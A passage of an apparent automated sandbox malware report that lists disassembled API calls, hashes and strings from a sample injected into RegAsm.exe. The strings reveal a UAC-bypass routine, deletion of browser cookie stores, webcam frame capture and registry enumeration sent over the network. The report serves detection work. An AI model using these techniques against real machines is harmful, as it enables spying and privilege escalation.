                                                                                                                                                                      • __fassign.LIBCMT ref: 0044B514
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                                                                                                                                      • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000), ref: 0044B559
                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000), ref: 0044B592
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1324828854-0
                                                                                                                                                                      • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                                                                                                      • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                                                                                                                                      • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                                                                                                      • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32 ref: 00413D81
                                                                                                                                                                        • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                                                                                                        • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                                                                                                                                        • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00413EEF
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseEnumInfoOpenQuerysend
                                                                                                                                                                      • String ID: xUG$NG$NG$TG
                                                                                                                                                                      • API String ID: 3114080316-2811732169
                                                                                                                                                                      • Opcode ID: 6d72fe2b66a30c91890655e11a730b6c52f749376543310d6eb36e2ea9a9b40e
                                                                                                                                                                      • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                                                                                                                                                      • Opcode Fuzzy Hash: 6d72fe2b66a30c91890655e11a730b6c52f749376543310d6eb36e2ea9a9b40e
                                                                                                                                                                      • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                                                                                                                                                      APIs
                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                      • String ID: csm
                                                                                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                                                                                      • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                                      • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                                                                                                      • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                                      • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32 ref: 00413678
                                                                                                                                                                        • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                                                                                                                        • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                                                                                                                        • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                                                                                        • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                                                                                                      • _wcslen.LIBCMT ref: 0041B7F4
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                                                                                                      • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                                                                                                                                      • API String ID: 3286818993-122982132
                                                                                                                                                                      • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                                                                                                      • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                                                                                                                                      • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                                                                                                      • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                                                                                        • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                                                                                                        • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                                                                                                                                      • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                                                                                      • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                                                                                      • API String ID: 1133728706-4073444585
                                                                                                                                                                      • Opcode ID: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                                                                                                                                                                      • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                                                                                                                                                      • Opcode Fuzzy Hash: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                                                                                                                                                                      • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                                                                                                                                                                      • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                                                                                                                                      • Opcode Fuzzy Hash: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                                                                                                                                                                      • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                                                                                                      • _free.LIBCMT ref: 100092AB
                                                                                                                                                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                      • _free.LIBCMT ref: 100092B6
                                                                                                                                                                      • _free.LIBCMT ref: 100092C1
                                                                                                                                                                      • _free.LIBCMT ref: 10009315
                                                                                                                                                                      • _free.LIBCMT ref: 10009320
                                                                                                                                                                      • _free.LIBCMT ref: 1000932B
                                                                                                                                                                      • _free.LIBCMT ref: 10009336
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                      • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                      • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                                                                                                      • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                      • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                                                                                                                                      • _free.LIBCMT ref: 00450FC8
                                                                                                                                                                        • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                                                        • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                                      • _free.LIBCMT ref: 00450FD3
                                                                                                                                                                      • _free.LIBCMT ref: 00450FDE
                                                                                                                                                                      • _free.LIBCMT ref: 00451032
                                                                                                                                                                      • _free.LIBCMT ref: 0045103D
                                                                                                                                                                      • _free.LIBCMT ref: 00451048
                                                                                                                                                                      • _free.LIBCMT ref: 00451053
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                      • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                                                                      • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                                                                                                                                      • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                                                                      • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                                                                                                                                      APIs
                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                                                                                                                                      • int.LIBCPMT ref: 004111BE
                                                                                                                                                                        • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                                                                                        • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                                                      • String ID: (mG
                                                                                                                                                                      • API String ID: 2536120697-4059303827
                                                                                                                                                                      • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                                                                                                                      • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                                                                                                                                                      • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                                                                                                                      • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                                                      • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                                                                                                                      • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                                                                                                                                      • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                                                                                                                      • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                                                                                                                                      APIs
                                                                                                                                                                      • CoInitializeEx.OLE32(00000000,00000002), ref: 0040760B
                                                                                                                                                                        • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                                                                                                                                        • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00407664
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InitializeObjectUninitialize_wcslen
                                                                                                                                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                                                                                      • API String ID: 3851391207-1839356972
                                                                                                                                                                      • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                                                                                                      • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                                                                                                                                      • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                                                                                                      • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                                                                                                                                      APIs
                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040BB22
                                                                                                                                                                      Strings
                                                                                                                                                                      • [Chrome Cookies not found], xrefs: 0040BB3C
                                                                                                                                                                      • UserProfile, xrefs: 0040BAE8
                                                                                                                                                                      • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                                                                                                                                      • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DeleteErrorFileLast
                                                                                                                                                                      • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                                                                      • API String ID: 2018770650-304995407
                                                                                                                                                                      • Opcode ID: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                                                                                                                                                      • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                                                                                                                                      • Opcode Fuzzy Hash: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                                                                                                                                                      • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                                                                                                                                      APIs
                                                                                                                                                                      • __allrem.LIBCMT ref: 0043ACE9
                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                                                                                                                                      • __allrem.LIBCMT ref: 0043AD1C
                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                                                                                                                                      • __allrem.LIBCMT ref: 0043AD51
                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1992179935-0
                                                                                                                                                                      • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                                                                                                                      • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                                                                                                                                      • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                                                                                                                      • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                                                                                                                                                        • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prologSleep
                                                                                                                                                                      • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                                                                                                                                      • API String ID: 3469354165-3054508432
                                                                                                                                                                      • Opcode ID: 18da6155d95f6aa4cbed861c7fa3d16b08516d870a7c00cd1f1401118ad4f6f5
                                                                                                                                                                      • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                                                                                                                                                      • Opcode Fuzzy Hash: 18da6155d95f6aa4cbed861c7fa3d16b08516d870a7c00cd1f1401118ad4f6f5
                                                                                                                                                                      • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __cftoe
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4189289331-0
                                                                                                                                                                      • Opcode ID: df708042516445aa89903c6330052172adb2df4233c064de01baf1be20d0a2ef
                                                                                                                                                                      • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                                                                                                                                      • Opcode Fuzzy Hash: df708042516445aa89903c6330052172adb2df4233c064de01baf1be20d0a2ef
                                                                                                                                                                      • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                                                                                                                                      APIs
                                                                                                                                                                      • _strlen.LIBCMT ref: 10001607
                                                                                                                                                                      • _strcat.LIBCMT ref: 1000161D
                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                                                                                                      • lstrcatW.KERNEL32(?,?), ref: 1000165A
                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                                                                                                      • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1922816806-0
                                                                                                                                                                      • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                                                      • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                                                                                                                      • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                                                      • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrcatW.KERNEL32(?,?), ref: 10001038
